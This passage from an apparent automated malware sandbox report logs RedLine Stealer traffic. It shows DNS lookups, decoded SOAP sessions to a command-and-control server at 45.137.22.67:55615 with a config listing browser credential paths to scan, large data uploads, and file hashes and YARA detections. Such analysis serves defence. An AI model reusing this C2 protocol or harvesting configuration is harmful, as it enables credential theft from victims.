                      Jun 15, 2024 20:22:31.930396080 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930423021 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930449963 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930480957 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930511951 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930537939 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930565119 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930591106 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930618048 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930644035 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930670023 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930695057 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930721045 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930747032 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930773973 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930799961 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930825949 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930851936 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930877924 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930903912 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930929899 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930955887 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.930983067 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931009054 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931035042 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931061029 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931086063 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931113005 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931143045 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931174994 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931201935 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931226969 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931252956 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931281090 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931307077 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931333065 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931359053 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931385040 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931411028 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931437969 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931463957 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931490898 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931516886 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931543112 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931569099 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931595087 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931621075 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931647062 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931673050 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931699038 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931725025 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931751966 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931777954 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931824923 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931858063 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931885958 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931912899 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931938887 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931965113 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.931992054 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932018042 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932044029 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932070971 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932096004 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932122946 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932149887 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932177067 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932203054 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932229042 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932255030 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932281017 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932306051 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932332039 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932357073 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932384014 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932410002 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932435036 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.932466030 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.937645912 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.937671900 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.937697887 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.937949896 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.937977076 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938003063 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938028097 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938054085 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938081026 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938107014 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938133001 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938158035 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938184023 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938210011 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938235998 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938262939 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938290119 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938314915 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938340902 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:31.938366890 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:33.103362083 CEST556154972345.137.22.67192.168.2.5
                      Jun 15, 2024 20:22:33.121454000 CEST4972255615192.168.2.545.137.22.67
                      Jun 15, 2024 20:22:33.121628046 CEST4972355615192.168.2.545.137.22.67
                      TimestampSource PortDest PortSource IPDest IP
                      Jun 15, 2024 20:22:19.792176008 CEST6133753192.168.2.51.1.1.1
                      Jun 15, 2024 20:22:33.087971926 CEST5265953192.168.2.51.1.1.1
                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                      Jun 15, 2024 20:22:19.792176008 CEST192.168.2.51.1.1.10x57cbStandard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      Jun 15, 2024 20:22:33.087971926 CEST192.168.2.51.1.1.10x1de4Standard query (0)api.ip.sbA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      Jun 15, 2024 20:22:19.799233913 CEST1.1.1.1192.168.2.50x57cbNo error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      Jun 15, 2024 20:22:33.103152990 CEST1.1.1.1192.168.2.50x1de4No error (0)api.ip.sbapi.ip.sb.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                      • 45.137.22.67:55615
                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.54971045.137.22.67556158068C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      TimestampBytes transferredDirectionData
                      Jun 15, 2024 20:22:13.614931107 CEST239OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 45.137.22.67:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jun 15, 2024 20:22:14.436089039 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:12 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jun 15, 2024 20:22:19.484477043 CEST222OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 45.137.22.67:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 15, 2024 20:22:19.746203899 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 4963
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:17 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>115.216.239.122</b:string><b:string>113.71.251.160</b:string><b:string>116.23.160.228</b:string><b:string>113.104.182.58</b:string><b:string>36.98.29.146</b:string><b:string>128.90.60.8</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:s [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      1192.168.2.54971845.137.22.67556155404C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      TimestampBytes transferredDirectionData
                      Jun 15, 2024 20:22:20.564523935 CEST239OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"
                      Host: 45.137.22.67:55615
                      Content-Length: 137
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jun 15, 2024 20:22:21.384052038 CEST359INHTTP/1.1 200 OK
                      Content-Length: 212
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:19 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
                      Jun 15, 2024 20:22:26.497710943 CEST222OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"
                      Host: 45.137.22.67:55615
                      Content-Length: 144
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 15, 2024 20:22:26.762984037 CEST1236INHTTP/1.1 200 OK
                      Content-Length: 4963
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:24 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED]
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>115.216.239.122</b:string><b:string>113.71.251.160</b:string><b:string>116.23.160.228</b:string><b:string>113.104.182.58</b:string><b:string>36.98.29.146</b:string><b:string>128.90.60.8</b:string></a:BlockedIP><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:s [TRUNCATED]


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      2192.168.2.54972045.137.22.67556158068C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      TimestampBytes transferredDirectionData
                      Jun 15, 2024 20:22:22.923113108 CEST220OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 45.137.22.67:55615
                      Content-Length: 559666
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 15, 2024 20:22:24.678530931 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:23 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>
                      Jun 15, 2024 20:22:24.680370092 CEST216OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 45.137.22.67:55615
                      Content-Length: 559658
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 15, 2024 20:22:25.104408026 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:23 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      3192.168.2.54972245.137.22.67556155404C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      TimestampBytes transferredDirectionData
                      Jun 15, 2024 20:22:29.544279099 CEST220OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"
                      Host: 45.137.22.67:55615
                      Content-Length: 559133
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Jun 15, 2024 20:22:31.263437033 CEST294INHTTP/1.1 200 OK
                      Content-Length: 147
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:29 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>


                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      4192.168.2.54972345.137.22.67556155404C:\Users\user\AppData\Roaming\AJzHYZtQIb.exe
                      TimestampBytes transferredDirectionData
                      Jun 15, 2024 20:22:31.272996902 CEST240OUTPOST / HTTP/1.1
                      Content-Type: text/xml; charset=utf-8
                      SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"
                      Host: 45.137.22.67:55615
                      Content-Length: 559125
                      Expect: 100-continue
                      Accept-Encoding: gzip, deflate
                      Connection: Keep-Alive
                      Jun 15, 2024 20:22:33.103362083 CEST408INHTTP/1.1 200 OK
                      Content-Length: 261
                      Content-Type: text/xml; charset=utf-8
                      Server: Microsoft-HTTPAPI/2.0
                      Date: Sat, 15 Jun 2024 18:22:31 GMT
                      Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                      Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>


                      Click to jump to process

                      Click to jump to process

                      Click to dive into process behavior distribution

                      Click to jump to process

                      Target ID:0
                      Start time:14:21:59
                      Start date:15/06/2024
                      Path:C:\Users\user\Desktop\w4XFffGDz1.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\w4XFffGDz1.exe"
                      Imagebase:0x170000
                      File size:920'266 bytes
                      MD5 hash:2185ECDE5380054AD075B7A25AE0EA51
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:low
                      Has exited:true

                      Target ID:7
                      Start time:14:22:01
                      Start date:15/06/2024
                      Path:C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\AppData\Local\Temp\RarSFX0\PO.exe"
                      Imagebase:0x600000
                      File size:743'944 bytes
                      MD5 hash:86F98523CEB67DF5CC3431A839F63134
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.2160567285.000000000453C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
